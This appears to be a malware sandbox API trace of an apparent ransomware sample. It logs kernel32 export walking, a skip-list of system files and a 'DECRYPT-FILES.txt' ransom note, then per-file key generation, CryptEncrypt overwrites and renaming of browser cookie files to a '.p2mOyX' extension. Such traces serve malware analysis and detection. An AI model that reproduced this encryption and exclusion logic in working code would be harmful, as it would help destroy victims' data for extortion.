[0079.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.455] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.455] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.455] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.455] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.455] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.455] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.455] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.455] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.455] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.455] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.455] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.455] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.455] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.455] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.456] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.456] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.456] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.456] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.456] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.456] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.456] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.456] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.456] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.456] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.456] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.456] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.456] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt") returned 110 [0079.456] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt.p2mOyX") returned 117 [0079.457] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[4].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt.p2mOyX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[4].txt.p2moyx"), dwFlags=0x0) returned 1 [0079.458] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.458] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.458] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.459] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x465ba5f0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x465ba5f0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x465ba5f0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@linkedin[1].txt", cAlternateFileName="5P1C80~1.TXT")) returned 1 [0079.459] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.459] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="autorun.inf") returned -1 [0079.459] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="boot.ini") returned -1 [0079.459] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="desktop.ini") returned -1 [0079.459] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="ntuser.dat") returned -1 [0079.459] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="iconcache.db") returned -1 [0079.459] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="bootsect.bak") returned -1 [0079.459] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="ntuser.dat.log") returned -1 [0079.459] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="thumbs.db") returned -1 [0079.459] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="Bootfont.bin") returned -1 [0079.459] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@linkedin[1].txt") returned 36 [0079.459] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.459] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.459] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.459] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.459] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.459] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@linkedin[1].txt") returned 36 [0079.459] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.459] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@linkedin[1].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt" [0079.459] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.459] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.460] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=272) returned 1 [0079.460] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.460] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.461] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.461] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.461] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.461] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.461] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.462] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.462] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.462] CloseHandle (hObject=0x464) returned 1 [0079.462] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.462] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.463] CloseHandle (hObject=0x0) returned 0 [0079.463] CloseHandle (hObject=0x460) returned 1 [0079.464] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.464] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.464] GetTickCount () returned 0x114c5c0 [0079.464] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.465] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.465] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.465] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.465] lstrlenA (lpString="kernel32.dll") returned 12 [0079.465] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.465] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.466] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.466] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.466] lstrlenA (lpString="ADDATOMA") returned 8 [0079.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.466] lstrlenA (lpString="ADDATOMW") returned 8 [0079.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.466] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.466] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.466] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.466] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.466] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.466] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.466] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.466] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.466] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.466] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.466] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.466] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.466] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.466] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.467] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.467] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.467] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.467] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.467] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.467] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.467] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.467] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.467] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.467] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.467] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.467] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.467] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.467] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.467] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.467] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.467] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.468] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.468] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.468] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.468] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.468] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.468] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.468] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.468] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.468] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.468] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.468] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.468] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.468] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.468] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.468] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.468] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.468] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.468] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.468] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.469] lstrlenA (lpString="BEEP") returned 4 [0079.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" 